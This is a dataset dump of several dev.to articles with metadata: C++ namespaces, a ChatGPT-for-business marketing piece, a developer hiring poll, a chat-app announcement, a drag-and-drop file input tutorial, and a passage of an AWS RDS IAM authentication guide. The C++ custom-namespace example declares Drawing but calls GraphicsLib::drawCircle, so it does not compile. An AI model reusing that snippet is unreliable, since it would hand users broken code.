id
int64
5
1.93M
title
stringlengths
0
128
description
stringlengths
0
25.5k
collection_id
int64
0
28.1k
published_timestamp
timestamp[s]
canonical_url
stringlengths
14
581
tag_list
stringlengths
0
120
body_markdown
stringlengths
0
716k
user_username
stringlengths
2
30
1,913,685
Using namespace std :)
A namespace in C++ is a way to organize code into logical groups and prevent name conflicts by...
0
2024-07-16T17:16:49
https://dev.to/madgan95/using-namespace-std--lo5
beginners, cpp, basic, c
A namespace in C++ is a way to organize code into logical groups and prevent name conflicts by creating a distinct scope for identifiers such as functions, classes, and variables. It helps in managing libraries and avoiding naming collisions in large projects. --- # Let's understand this with an analogy: ## The Bookstore Analogy **The Books:** Imagine a bookstore that contains books on various subjects. Each book has a unique identifier, a **category number**, to distinguish it from other books. In this analogy: **Books** are like the functions, classes, and variables in C++. Category numbers are like namespaces. **Sections:** The Bookstore is divided into different sections, each containing books on specific topics. For example: **Mathematics Section** **Literature Section** **Stories Section** --- # Now let us fit in the example: ## The std Namespace as a Section Think of std namespace as Standard section in that bookstore. It has books such as: **iostream** for input and output **vector** for dynamic arrays **string** for text strings ## To use a book from std Section: ``` #include <iostream> int main() { std::cout << "Hello, World!" << std::endl; return 0; } ``` This above code is similar to saying, **"I want to read the book cout and endl from std section of the bookstore"** ## Books from only std section: If you find it tedious to specify the section name every time to borrow book from std section, you can say: **"I will mostly borrow books from std section"** ``` #include <iostream> using namespace std; int main() { cout << "Hello, World!" << endl; return 0; } ``` --- # Other Sections/Namespace in C++: ## Boost Namespace: The Boost Section contains advanced books that extend the functionality of the standard library. Books: smart pointers, regular expressions, threads, etc. ``` #include <boost/shared_ptr.hpp> #include <iostream> int main() { boost::shared_ptr<int> ptr(new int(10)); std::cout << "Value: " << *ptr << std::endl; return 0; } ``` ## Custom Namespace: ``` namespace Drawing { void drawCircle() { std::cout<< "Drawing a circle"<<std::endl; } } int main() { GraphicsLib::drawCircle(); return 0; } ``` # Knowhow **Libraries:** &lt;vector&gt;, &lt;iostream&gt;, &lt;string&gt; etc **Namespace:** std, boost etc **Functions:** cout, cin etc -----------------------------------------------------------------
madgan95
1,914,025
Implementing ChatGPT for Business Efficiency
Unlock the potential of your business with ChatGPT. Discover how to implement Generative AI to enhance productivity, automate routine tasks, and elevate customer interactions. Learn the strategic steps for seamless AI integration and leverage Dev3loper.ai’s consulting, development, and training services to drive innovation and achieve your business goals. Embrace the future of efficiency and growth with expert guidance and powerful AI solutions.
0
2024-07-15T05:07:46
https://dev.to/dev3l/implementing-chatgpt-for-business-efficiency-3234
generativeai, ai, productivity, transformation
--- title: Implementing ChatGPT for Business Efficiency published: true description: Unlock the potential of your business with ChatGPT. Discover how to implement Generative AI to enhance productivity, automate routine tasks, and elevate customer interactions. Learn the strategic steps for seamless AI integration and leverage Dev3loper.ai’s consulting, development, and training services to drive innovation and achieve your business goals. Embrace the future of efficiency and growth with expert guidance and powerful AI solutions. tags: GenerativeAI, AI, Productivity, Transformation cover_image: https://dev-to-uploads.s3.amazonaws.com/uploads/articles/gd30mlbcf6mi96sih9mg.png --- [Originally posted on Dev3loper.ai](https://www.dev3loper.ai/insights/implementing-chatgpt-for-business-efficiency) In the modern business landscape, innovation is the key to staying ahead. Generative AI capabilities rapidly transform companies' operations, creating unprecedented efficiency and productivity opportunities. ChatGPT, developed by OpenAI, stands at the forefront of this revolution, offering businesses a powerful tool to amplify human potential and streamline operations. Imagine a world where routine tasks are automated, personalized customer interactions are handled seamlessly, and insightful content is generated effortlessly—all with the aid of AI. While these technologies are not yet at a point where they can wholly replace human efforts, they serve as indispensable tools that multiply the productivity and impact of individuals and organizations. Dev3loper.ai is dedicated to helping businesses harness the transformative power of Generative AI. Our comprehensive range of consulting services is designed to accelerate technological innovation and adoption, empowering your organization to achieve its strategic goals. Join us as we explore how ChatGPT can be seamlessly integrated into your business processes, driving efficiency, optimizing operations, and enabling your team to focus on what they do best. Welcome to the AI-driven future of business. Welcome to Dev3loper.ai. ## Understanding the Potential of ChatGPT ![Understanding the Potential of ChatGPT](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/6wh9ji0p8wr5juzxbbn7.png) Generative AI, specifically ChatGPT, is revolutionizing businesses' operations by automating routine tasks and enhancing human capabilities. ChatGPT is a sophisticated language model developed by OpenAI that can understand and generate human-like text. Here's a deeper look into its core functionalities and potential applications: ### What is ChatGPT? ChatGPT is an advanced AI model designed to generate and understand natural language. It can comprehend context, engage in productive conversations, and produce coherent and relevant text across various domains. ChatGPT's versatility can be applied in many business scenarios where effective communication and data processing are crucial. ### The Transformative Potential of ChatGPT When integrated into business operations, ChatGPT can: - **Boost Efficiency:** Automate repetitive tasks, freeing up human resources for more strategic activities. - **Enhance Productivity:** Provide instant responses and support, enabling teams to operate more effectively. - **Improve Customer Relations:** Personalize interactions and offer round-the-clock assistance, increasing customer satisfaction. - **Generate Valuable Content:** Create high-quality content quickly, supporting marketing and communication efforts. By leveraging ChatGPT, businesses can transform from human-driven, machine-assisted operations to AI-driven, human-assisted models. This paradigm shift optimizes resource allocation and opens up new avenues for innovation and growth. At Dev3loper.ai, we specialize in helping businesses realize the full potential of Generative AI. Our tailored strategies and support systems ensure that your integration of ChatGPT is seamless, effective, and aligned with your unique business goals. ## Major Applications of Generative AI in Business ![Major Applications of Generative AI in Business](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/575nj1ej25jo2uasaq4c.png) Generative AI, like ChatGPT, has diverse applications that can revolutionize various business functions. Here, we'll delve into the primary areas this technology can significantly impact. ### Lead Generation and Qualification **Information Processing:** ChatGPT can process vast amounts of information about potential leads from multiple sources, allowing sales teams to focus on high-potential prospects. Businesses can ensure they are pursuing the most promising leads by automating the research process. **Web Scraping:** Generative AI can gather valuable insights from websites, social media, and other knowledge bases, identifying leads that fit specified criteria and helping create a comprehensive database of potential customers. **Profile Creation and Matching:** AI can generate detailed profiles for each lead, matching them with your ideal customer criteria. This ensures the sales team's efforts are directed toward the most relevant prospects. **Customized Email Drafting and Content Suggestions:** ChatGPT can craft personalized outreach emails and content for each lead, tailoring messaging to increase engagement. This personalization often leads to higher conversion rates and stronger customer relationships. ### Content Creation **Automated Drafting:** AI can automate drafting blog posts, marketing materials, reports, and other written content. This ensures a steady flow of high-quality content without straining resources. **Personalized Newsletters and Ad Campaigns:** Generative AI can produce highly targeted newsletters and ad campaigns tailored to specific audience segments. This customization enhances the relevancy and effectiveness of marketing efforts. **Creative Assistance:** ChatGPT can assist in creating scripts for videos or podcasts, designing mock-ups for marketing materials, and generating engaging company stories that resonate with your audience. ### Customer Support **AI-Powered Chatbots:** AI chatbots can handle first-line support 24/7, quickly responding to common inquiries. This reduces the workload on human support teams and ensures customers receive timely assistance. **Sentiment Analysis:** ChatGPT can analyze customer feedback from various channels to gauge sentiment and identify emerging trends. This proactive approach helps address issues before they escalate, improving customer satisfaction. **Help Center Content Generation:** AI can create FAQs, how-to guides, and troubleshooting manuals, which are invaluable for customers and support agents. This comprehensive support content enhances self-service capabilities. ### Process Automation **Document Generation:** AI can automate the creation of standard documents such as contracts, invoices, and reports. This ensures accuracy and consistency while freeing up time for more strategic tasks. **Routine Communication Automation:** ChatGPT can generate and schedule routine communications, such as appointment reminders, payment follow-ups, and renewal notices. This automation enhances efficiency and ensures timely interactions with customers and clients. **Workflow Optimization:** AI can suggest improvements to process workflows based on detected inefficiencies. This can lead to more streamlined operations and better resource utilization. ### Sales and Marketing **Campaign Personalization:** Generative AI can create highly targeted advertising copy and materials for specific customer segments or individuals, enhancing campaign effectiveness and ROI. **Meeting Summaries:** ChatGPT can draft summaries of sales calls and meetings, highlighting key points, action items, and follow-ups. This ensures clear communication and accountability within the team. **Market Research:** AI can generate summaries of market trends, competitive analysis reports, and industry updates. These insights empower sales and marketing teams to make data-driven decisions. ### Human Resources **Recruitment Messaging:** AI can compose personalized recruitment messages, job postings, and follow-up emails, making the recruitment process more efficient and engaging for candidates. **Policy and Training Material Creation:** ChatGPT can draft HR policies, training manuals, and onboarding materials, ensuring comprehensive and up-to-date documentation. **Employee Engagement Analysis:** AI can analyze survey results to provide insights into employee satisfaction and suggest actionable improvements to foster a positive workplace culture. ## Steps to Implement ChatGPT in Your Business ![Steps to Implement ChatGPT in Your Business](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/b3wu4515j0pqpptmap2r.png) Implementing ChatGPT in your business involves a strategic approach to ensure that the AI integration aligns seamlessly with your organizational goals. Follow these steps to maximize the benefits of this powerful technology: ### Step 1: Identify Needs and Use Cases **Analyze Areas for AI Integration:** Begin by analyzing which parts of your operations can most benefit from automation and AI assistance. Common areas include customer service, marketing, sales, and internal documentation. Identifying specific pain points where ChatGPT can provide significant value is crucial. **Outline Common Applicable Business Areas:** Determine the broader business functions—lead generation, content creation, customer support, process automation, sales, marketing, and human resources—that Generative AI can enhance. This holistic understanding will guide the AI implementation strategy. ### Step 2: Engage with AI Consulting Services Dev3loper.ai's AI Consulting Services provide the expertise needed to navigate the complexities of AI implementation and ensure transformative results. **Personalized AI Consulting:** - **Assessment:** Evaluate your current systems, processes, and data readiness to establish a baseline. - **Strategic Planning:** Develop a roadmap for AI adoption aligned with your business goals. - **Model Development:** Design and train AI models tailored to your specific use cases. - **Implementation:** Seamlessly integrate AI solutions into your infrastructure with minimal disruption. - **Evaluation and Optimization:** Continuously monitor and refine AI models to ensure optimal performance. **Proof of Concept & Production Release:** - **Concept Validation:** Test and validate AI concepts on a small scale to ensure feasibility and effectiveness. - **Data Preparation:** Prepare and preprocess data accurately to train models. - **Model Training:** Utilize best practices and the latest techniques for optimum performance. - **Deployment:** Implement models in a production environment with robust monitoring and management. - **Operationalization:** Establish MLOps practices to manage, monitor, and maintain AI systems in production. **Custom GPTs and OpenAI Assistants Development:** - **Requirement Analysis:** Understand the specific needs for AI assistants and NLP. - **Model Customization:** Develop and fine-tune GPT models tailored to business needs. - **Integration:** Integrate AI assistants into existing systems like customer service platforms or CRMs. - **Training and Refinement:** Continuously improve AI assistants based on interaction data. - **User Experience Optimization:** Ensure AI interactions are engaging, relevant, and valuable. ### Step 3: Develop and Integrate **Custom Full-Stack Software Development:** Dev3loper.ai's software development services ensure that AI solutions seamlessly integrate your existing workflows. - **Requirement Analysis:** Collaborate with stakeholders to understand business needs and project requirements. - **Architectural Design:** Develop a flexible architectural plan that ensures scalability and security. - **Development and Implementation:** Build robust applications using Agile and XP practices, such as continuous integration, pair programming, and test-driven development. - **Rapid Deployment:** Deliver functional software quickly for early feedback. - **Continuous Refinement:** Iterate based on user feedback to enhance performance. - **Testing and Quality Assurance:** Maintain functionality and security through ongoing testing. - **Maintenance and Support:** Ensure systems evolve to meet changing business needs. ### Step 4: Train and Coach Team Members **Technical and Developmental Coaching:** Dev3loper.ai provides coaching to elevate your team's skills in utilizing AI tools and implementing best practices. - **Skills Assessment:** Evaluate current skill levels and identify areas for improvement. - **Customized Training Plans:** Develop personalized coaching plans based on identified needs. - **Hands-On Workshops:** Conduct practical workshops on AI tools and practices like TDD. - **Iterative Feedback and Improvement:** Provide continuous feedback and training sessions to reinforce learning. - **Follow-Up Support:** Offer ongoing support to address challenges and reinforce skills. **Custom-Tailored Courses:** - **Needs Analysis:** Identify specific training needs and objectives. - **Course Design:** Develop bespoke coursAnalysist tailored to goals. - **Interactive Learning:** Use interactive teaching methods, including live coding sessions and real-world case studies. - **Continuous Assessment:** Implement assessments to measure progress and adjust content as needed. - **Resource Provision:** Provide additional materials for ongoing education and skill development. ### Step 5: Continuous Improvement and Adaptation **Ongoing AI Performance Evaluation:** Regularly assess the performance of AI systems to ensure they meet the evolving needs of the business and provide continuous value. **Collaborative AI Application Development:** - **Capability Building:** Enhance your organization's internal AI competencies through collaborative development and training. - **Methodological Innovation:** Introduce and implement AI methodologies that improve efficiency and effectiveness. - **Support and Maintenance:** Provide continuous support to adapt AI systems to new challenges and opportunities. **Leveraging Artium's APEX Framework:** Utilize Artium's APEX framework to develop a concrete product plan and a business proposal, laying a solid foundation for successful AI integration. This framework helps articulate ideas clearly and aligns AI strategies with business objectives. ## Leveraging Dev3loper.ai’s Specialty Services ![Leveraging Dev3loper.ai’s Specialty Services](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/r2qxe64poe7v5hfw5lbm.png) Dev3loper.ai offers a suite of specialty services designed to address specific needs within your organization. These services ensure that your AI integration is comprehensive and practical, providing the extra support required to optimize your AI capabilities and drive business success. ### Technical Ghost Writing **Bespoke AI Content Creation:** Dev3loper.ai provides high-quality content tailored to your needs, ensuring your AI initiatives are clearly and effectively communicated to your target audience. This includes creating white papers, technical documents, and marketing materials. **Our Ghostwriting Process:** - **Requirement Gathering:** Collaborate with stakeholders to understand content needs and objectives. - **Research and Analysis:** Conduct thorough research to ensure content accuracy and relevance. - **Content Creation:** Develop high-quality, impactful content tailored to your audience. - **Review and Revision:** Work with stakeholders to review and refine content, ensuring it meets expectations. - **Final Delivery and Support:** Provide the finalized content and offer support for any additional modifications or improvements. ### Comprehensive Strategy and Planning Dev3loper.ai helps define and execute strategic plans that align with your business goals. Our holistic approach ensures that every aspect of your AI initiative is well thought out and contributes to overall success. **Our Strategic Planning Framework:** - **Business Case Development:** Collaborate with stakeholders to develop robust business cases for AI and software investments. - **Product Vision Exploration:** Define a clear product vision that aligns with your strategic goals. - **Backlog Creation:** Develop and prioritize a product backlog, ensuring development tasks are aligned with business objectives. - **Core User Identification:** Identify and analyze core user demographics to tailor product features and functionality. - **Implementation Roadmap:** Create a detailed roadmap guiding the execution of strategic plans. - **Continuous Evaluation:** Regularly review and adjust strategies based on feedback and changing market conditions, ensuring sustained alignment with business goals. ### Organizational AI Capability Building Dev3loper.ai supports collaborative development of AI applications, model training, and methodological innovation, helping build your organization's internal AI competencies. **Our Capability-Building Approach:** - **Assessment and Planning:** Evaluate current AI capabilities and identify areas for growth. - **Training Programs:** Develop and deliver training programs tailored to your organization's needs. - **Collaborative Development:** Work with your team to develop AI applications and train models, ensuring knowledge transfer and skill-building. - **Methodological Innovation:** Introduce and implement AI methodologies that enhance your organization's capabilities. - **Ongoing Support:** Provide continuous support to ensure the sustained growth of your AI competencies. --- By leveraging Dev3loper.ai's specialty services, businesses can ensure their AI integration is successful and optimized for long-term growth and efficiency. With comprehensive strategy and planning, bespoke content creation, and robust capability building, your organization can thrive in an AI-driven future. ## Conclusion ![Conclusion](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/6ow76cjsvvmfrl0n9nrt.png) Integrating ChatGPT and other Generative AI technologies into business operations represents a transformative leap into the future of efficiency and innovation. By automating routine tasks, generating personalized content, and enhancing customer interactions, ChatGPT empowers businesses to achieve new levels of productivity and operational excellence. Throughout this article, we've explored ChatGPT's vast potential, from lead generation and content creation to customer support and process automation. These applications highlight how AI can augment human capabilities, ensuring that your team can focus on strategic, high-impact activities rather than being bogged down by repetitive tasks. However, the successful adoption of AI requires a strategic approach. This is where Dev3loper.ai comes in. Our comprehensive range of consulting services, including personalized AI integration strategies, custom software development, and in-depth training and coaching, ensures that your organization can seamlessly embrace AI. With Dev3loper.ai's expertise, businesses like TechWave Solutions have harnessed the power of ChatGPT to drive significant growth and efficiency. The possibilities are endless, from generating detailed lead profiles to automating content creation and transforming customer support. At Dev3loper.ai, we believe in a future where AI is a powerful ally to human ingenuity. We aim to help you navigate the complexities of AI implementation, transforming theoretical potential into practical, impactful solutions. Now is the time to leverage AI's transformative power and stay ahead in the competitive business landscape. Contact Dev3loper.ai today to explore how our tailored AI consulting and development services can help your organization achieve its strategic goals and drive innovation. Together, we can shape a future where the synergy between human creativity and AI technology unlocks unprecedented possibilities for success and growth.
dev3l
1,914,224
Give tech layoffs, how long is it taking to hire devs?
Recently I became curious as to how the job market is for companies hiring developers. I wanted to...
0
2024-07-07T03:41:39
https://dev.to/brookzerker/give-tech-layoffs-how-long-is-it-taking-to-hire-devs-37n6
Recently I became curious as to how the job market is for companies hiring developers. I wanted to look into this as I truly believe that it is more cost effective to train devs instead of hiring new ones. But I wanted to gather some data instead of just relying on my feelings (and of course I'm biased too). My initial thought was the opposite of what I wanted to find though, that companies would be able to hire new developers quickly (within 3 months of starting the search) due to all the layoffs in the dev world that have been happening recently. So I set up some polls asking my followers on LinkedIn, YouTube, and X how long it was taking their companies to hire a dev. I gave three options plus a fun opt-out option for anyone who wanted to answer the poll but not give a real answer. The options were. - < 3 months - 3 - 6 months - > 6 months - companies are hiring? I left the poll running for a week and we now have the results. ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/qj6nu00e2k5ijm9vbnec.png) I got 117 responders to the poll, but 81 of them chose the `companies are hiring?` option, leaving 35 people across the other results. Of these 35 people 20 reported that it was taking more than six months to hire a new dev. 10 were able to hire in less than 3 months, and 5 were in the middle. I understand that this is a small sample size, and I didn't control to size, type, and/or region of the companies. I would love for someone with a larger audience to run the same poll and see if the numbers correlate. That being said, the response is opposite of what I originally thought, which is that it's taking many companies more that 3 months to hire new devs. And we also know that just hiring is only the first step. Once hired devs are going to need to be onboarded into the company and the projects. This could take a long time as well. Even with this smaller amount of data I'm more confident in my claim that a company that attempts to train their developers instead of laying them off to hire new developers with a different skillset is going to be cheaper in the short and long runs.
brookzerker
1,914,406
build a instagram message chat app
Hello, everyone! I have just build a web version of a chat application, similar to the cover image...
0
2024-07-14T08:44:54
https://dev.to/zwd321081/build-a-instagram-message-chat-app-ibn
javascript, graphql, react, mongodb
Hello, everyone! I have just build a web version of a chat application, similar to the cover image above You can watch a brief introduction video [youtube](https://youtu.be/S7Zanjrw8v4?si=O_JoZFdD8aPkmBms) The project consists of both client-side and server-side. The client-side utilizes [create-vite-app](https://vitejs.dev/guide/) with `Reactjs`+`Typescript` On the server-side,we will use `GraphQL`, `Apollo`,`MongoDB`,`Mongoose` The design file can be accessed [here](https://www.figma.com/design/AVkjKyXt9UpJPdxJt6EoV5/10-Real-Chat%2FMessaging-Pages---Facebook%2C-Reddit%2C-Snapchat-%26-more-(Community)?node-id=0-1&t=gx4KTbUaNaN409XH-0) ## Why use GraphQL? It's incredibly easy to use just right out of the box when starting up, and it can readily scale to meet large-scale demands when needed. 1. GraphQL is based on HTTP POST and has only one endpoint; all your request commands like CRUD operations, are sent via this single endpoint. 2. GraphQL is really convenient when nesting queries. 3. Apollo Framework provides builtin functionalities such as server management, API testing, And WebSocket subscriptions for message handling. The source code at [github](https://github.com/zwd321081/instgram-messages/tree/master)
zwd321081
1,914,903
Implementing Drag-Drop for File Input on the Web.
Drag-drop is one of the most engaging ways of transferring files between windows on a computer. All...
0
2024-07-16T12:17:54
https://dev.to/ghostaram/implementing-drag-drop-for-file-input-on-the-web-6c
Drag-drop is one of the most engaging ways of transferring files between windows on a computer. All modern file explorers come with this functionality. Browsers also happen to have a default behavior to drag-drop. By default, the browser will try to open a file dropped into it unless it is programmed to do something else. In this article, we will learn how to program the browser to treat a drag-drop as a file input operation. We will also extend the program to allow us to open the file input dialog and select a file by clicking the drop-drop target. Implementing actions during drag-drop can be done using the `DragEvent` interface provided in the browser by JavaScript. The `DragEvent` interface provides several events from when a drag begins to when it ends. In this article, we will leverage the power of the `DragEvent` interface to create a drag-drop file input user interface. We will implement the proposed user interface in the following order: 1. Create the HTML Markup 2. Style the Markup 3. Make it interactive 4. Style the interaction 5. Make it clickable Let's begin ... ## 1. Create the HTML Markup Before going any further into the article, let us create a simple HTML markup. ``` index.html <body> <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Drag and Drop File Upload</title> <link rel="stylesheet" href="./style.css"> </head> <body> <div id="drop-zone" class="drop-zone"> <p>Drag & drop files here or click to upload</p> </div> <script src="./drag-drop.js"></script> </body> </html> </body> </html> ``` ## 2. Style the Markup The following stylesheet provides a few basic styles for the page. ``` style.css body { font-family: Arial, sans-serif; display: flex; justify-content: center; align-items: center; height: 100vh; margin: 0; background-color: #f0f0f0; } .drop-zone { width: 300px; height: 200px; border: 2px dashed #007bff; border-radius: 4px; display: flex; justify-content: center; align-items: center; text-align: center; color: #007bff; cursor: pointer; transition: background-color 0.2s ease; } ``` The above markup and style create a container with a blue dotted border and prompt text. The screenshot below shows what we have just created when opened in the browser. ![The Drop zone container](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/0av6o8d8nhgu1lo0rlik.png) ## 3. Make it interactive Dragging and dropping files into the dotted container or clicking it to input files won't work just yet. We need JavaScript for that part. In the script, we will add various event listeners to elements in the document. The first event we will listen for is the `DOMContentLoaded` event on the `document`. ``` document.addEventListener('DOMContentLoaded', () => { }) ``` You might be wondering what the `DOMContentLoaded` event is and how it is different from the `load` event. Even more, why did we choose to use it over the `load` event? The `DOMContentLoaded` event is fired as soon as the `DOM` tree has been created. This event does not wait for other resources such as the styles, images, data, and other external resources to be loaded. The `DOMContentLoaded` is fired as soon as the elements of the page have been inserted into the DOM tree. On the other hand, the `load` event waits a little longer before it is fired. The `load` event is fired after all the resources of a page including styles, images, fetched data, and all other external resources have been loaded into the browser. Our interest in this project has nothing to do with external resources but everything to do with a few DOM elements. This is the reason why we are choosing to use the `DOMContentLoaded` event over the `load` event. The `load` event could work just as well but we do not need to wait for that long. We want to attach the event listeners to the target element as soon as they are added to the `DOM`. We will perform all subsequent operations and listen for all the other required events within the `DOMContentLoaded` event handler. ### The drop zone container We want to make the drop zone container aware of the drag-drop interaction. Here, we will tell the browser what to do when a file is dropped within the borders of the drop-zone container. First, we need to get the drop zone container element from the `DOM` as done below. ``` document.addEventListener('DOMContentLoaded', () => { const dropZone = document.querySelector('#drop-zone') }) ``` Next, we attach the `drop` event to the drop zone container and provide an event handler. ``` dropZone.addEventListener('drop', (event) =>{ }) ``` In the event handler, we will program the browser to treat the drag-and-drop interactions as a file input. This means that if the file is dragged and dropped within the borders of the drop zone container, the browser will override its default behavior with the program in the event handler function. You can do anything with the dropped file. In our case, we will simply log the file information in the browser's console. Below is the implementation: ``` dropZone.addEventListener('dragover', (event) =>{ event.preventDefault() }) dropZone.addEventListener('drop', (event) =>{ event.preventDefault() const files = event.dataTransfer.files console.log(files) }) ``` The code snippet above adds two even listeners to the drop zone container, the `dragover` and the `drop` events. Technically, we only care about dropping the file within the borders of the container. So why bother with the `dragover` event? We take care of the `dragover` event because we are dragging the file over the drop zone container before we can drop it and the browser has a default behavior to the `dragover` event. The least we can do about the default behavior of the browser is to prevent it. We access the files array from `event.dataTransfer` and log the list on the browser console. Everything works well but the look, not very much so. In the next section, we will add styles to the process. ## 4. Style the interaction What if you wanted to do more than prevent the default behavior of the browser? What if you intend to change the background color of the drag zone container throughout the process? Say one color when dragging over the drop zone container, a different color when you drag past the borders of the target container, and another color when you drop the file in the intended container. Well, that can easily be done as shown below. ``` dropZone.addEventListener('dragover', (event) =>{ event.preventDefault() dropZone.style.backgroundColor = '#e0e0e0' }) dropZone.addEventListener('dragleave', () =>{ dropZone.style.backgroundColor = '#eb6363a6' }) dropZone.addEventListener('drop', (event) =>{ event.preventDefault() dropZone.style.backgroundColor = '#f0f0f0' const files = event.dataTransfer.files console.log(files) }) ``` The adjustments above involve altering the background color of the drop zone container from the initial background color to a gray color when the file is dragged into the drop zone container. The color changes to a shade of red if the drag leaves the container without dropping the file. Dropping the file resets the color to the initial background color. That's all good but didn't we say we could also click it? Up next ... ## 5. Make it clickable The prompt in the container says we can also click the box to input a file. Unfortunately, clicking the box now doesn't open the file explorer as promised. How can we fix that? You guessed it right, add a click event listener to the container. ``` dropZone.addEventListener('click', () =>{ }) ``` We have added the `click` event listener, now what? In standard user interfaces, we trigger the opening of the file explorer by clicking a file input element that is displayed on a web page. In our case, we don't want to display a file input element. Lucky for us, we can add the element to the `DOM` and hide it from display using the `hidden` attribute. We can also click it programmatically using JavaScript. Extend the initial HTML markup to include the `input` element as shown below: ``` <body> <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Drag and Drop File Upload</title> <link rel="stylesheet" href="./style.css"> </head> <body> <div id="drop-zone" class="drop-zone"> <p>Drag & drop files here or click to upload</p> <input type="file" id="file-input" multiple hidden> </div> <script src="./drag-drop.js"></script> </body> </html> </body> </html> ``` The `hidden` attribute allows us to exclude the input element from the display while keeping it in the `DOM` tree. Now that we have the input element in the `DOM`, we can access it from our JS scripts and click it programmatically when the drop zone container is clicked. The code snippet below implements the program. ``` dropZone.addEventListener('click', () =>{ const fileInputElement = document.querySelector('input') fileInputElement.click() }) ``` ## Summary That is how we create a clickable drag-drop file input user interface. The drag-drop file input user interface uses the `DragEvent` interface which provides the `dragover`, `dragleave`, `drop`, and other browser events. When implementing the drag-drop file input, it is important to alter the styles of the drop target to improve the user experience. In addition to the drag-drop input, users will always appreciate an additional option for clicking the drop zone to open the file explorer. You can add a hidden file input element to your markup and click it programmatically when the drop zone is clicked. That's all for the article, thanks for reading. Feel free to say something in the comments section. Bye bye. Read more about [the `DragEvent` interface on MDN](https://developer.mozilla.org/en-US/docs/Web/API/DragEvent).
ghostaram
1,915,099
AWS: RDS IAM database authentication, EKS Pod Identities, and Terraform
We’re preparing to migrate our Backend API database from DynamoDB to AWS RDS with PostgreSQL, and...
0
2024-07-13T09:42:19
https://rtfm.co.ua/en/aws-rds-iam-database-authentication-eks-pod-identities-and-terraform/
kubernetes, devops, security, aws
--- title: AWS: RDS IAM database authentication, EKS Pod Identities, and Terraform published: true date: 2024-07-07 22:57:29 UTC tags: kubernetes,devops,security,aws canonical_url: https://rtfm.co.ua/en/aws-rds-iam-database-authentication-eks-pod-identities-and-terraform/ --- ![](https://cdn-images-1.medium.com/max/1024/1*JZAYCCIy6Muaxtz2FKpu0w.png) We’re preparing to migrate our Backend API database from DynamoDB to AWS RDS with PostgreSQL, and finally decided to try out [AWS RDS IAM database authentication](https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/UsingWithRDS.IAMDBAuth.html), which appeared in 2021. IAM database authentication, as the name implies, allows us to authenticate to RDS using AWS IAM instead of the login-password from the database server itself. However, authorization — that is, checking what access the user has to the database(s) — remains with the database server itself, because IAM will only give us access to the RDS instance itself. So what are we going to do today? - first, let’s try how RDS IAM database authentication works in general, and how it is configured - then we’ll move on to automation with Terraform, and will recall how [AWS EKS Pod Identities](https://rtfm.co.ua/en/aws-eks-pod-identities-a-replacement-for-irsa-simplifying-iam-access-management/) works - we will write a Python code that will run in a Kubernetes Pod with ServiceAccount attached and will connect to an RDS instance using RDS IAM database authentication - and finally, will discuss the challenges of using RDS IAM database authentication and automation with Terraform I’m testing on RDS, which is created for Grafana, so sometimes there will be names with “_monitoring_”/”_grafana_”. ### How RDS IAM database authentication is working? Documentation — [IAM database authentication for MariaDB, MySQL, and PostgreSQL](https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/UsingWithRDS.IAMDBAuth.html). The general idea is that instead of using a common password to RDS, an IAM token is used for an IAM Role or IAM User which has an IAM Policy connected, and that IAM Policy describes a username and an ID of an Aurora cluster or RDS instance. But, unfortunately, this is where the role of IAM ends, because accesses and permissions in the database server itself are created and managed as before, that is, through CREATE USER and GRANT PERMISSIONS. ### IAM database authentication and Kubernetes ServiceAccount As for Kubernetes Pod, I honestly expected a little more, because I thought that just using the IAM Role and Kubernetes ServiceAccount, it would be possible to connect to RDS without a password at all — as we do with access to other resources in AWS through the AWS API. But with RDS, the scheme looks a bit different: - we create an RDS instance with the IAM authentication parameter == true - then create an IAM Role with an IAM Policy - create a corresponding user in PostgreSQL/MariaDB, enable authentication via IAM - in Kubernetes, create a ServiceAccount with this role - connect this ServiceAccount to the Kubernetes Pod - in the Pod, using the IAM Role from that ServiceAccount, we’ll have to generate an IAM RDS Token for RDS access - and with that token, we can connect to the RDS server Let’s try it manually first, and then we’ll see how to do it with Terraform, because there are some nuances. ### RDS IAM authentication: testing So, we have an already created RDS PostgreSQL with _Password and IAM database authentication_: ![](https://cdn-images-1.medium.com/max/406/0*QtBEKmfq3rtyOoIi.png) For the server, we already have a default master user and password in the AWS Secrets Manager — you will need it to add a new user in the RDS. Find the instance ID — it will be needed in the IAM Policy: ![](https://cdn-images-1.medium.com/max/678/0*J0pasgdrvJ4gzWjz.png) ### Creating IAM Policy Next, we need an IAM Policy that will allow our future user access to this RDS instance. Go to IAM > Policy, create a new policy, see the documentation [Creating and using an IAM policy for IAM database access](https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/UsingWithRDS.IAMDBAuth.IAMPolicy.html): ``` { "Version": "2012-10-17", "Statement": [ { "Effect": "Allow", "Action": "rds-db:connect", "Resource": "arn:aws:rds-db:us-east-1:492 ***148:dbuser:db-UZM*** 3SA/db_test" } ] } ``` Here, we `Allow` the `rds-db:connect` action to the database server in `Resource` using the `db_test` username. Later, we will add the same `db_test` user by using the `CREATE USER` command on the database server itself. Note that there is not the RDS instance name set, but its ID  — ` db-XXXYYYZZZ`. Save the Policy: ![](https://cdn-images-1.medium.com/max/877/0*upS8InO3mliRzvp5.png) You can connect this Policy directly to your AWS IAM User or use an IAM Role. We’ll try with an IAM Role later when we’ll connect a Kubernetes Pod, but for now, let’s use a regular IAM User to test the mechanism in general. Find the required IAM User and add permissions: ![](https://cdn-images-1.medium.com/max/1024/0*cjOGCZJxJZ3367JG.png) Select _Attach policies directly_, find our IAM Policy: ![](https://cdn-images-1.medium.com/max/1024/0*rpQJk0XMyxSdIwcZ.png) The next step is to add the user to RDS. ### PostgreSQL: creating a database user Documentation — [Creating a database account using IAM authentication](https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/UsingWithRDS.IAMDBAuth.DBAccounts.html). > **Note** : Make sure the specified database user name is the same as a resource in the IAM policy for IAM database access That is, when running the `CREATE USER`, we must specify the same `db_test` user's name that is specified in the `"Resource"` of our IAM Policy: ``` 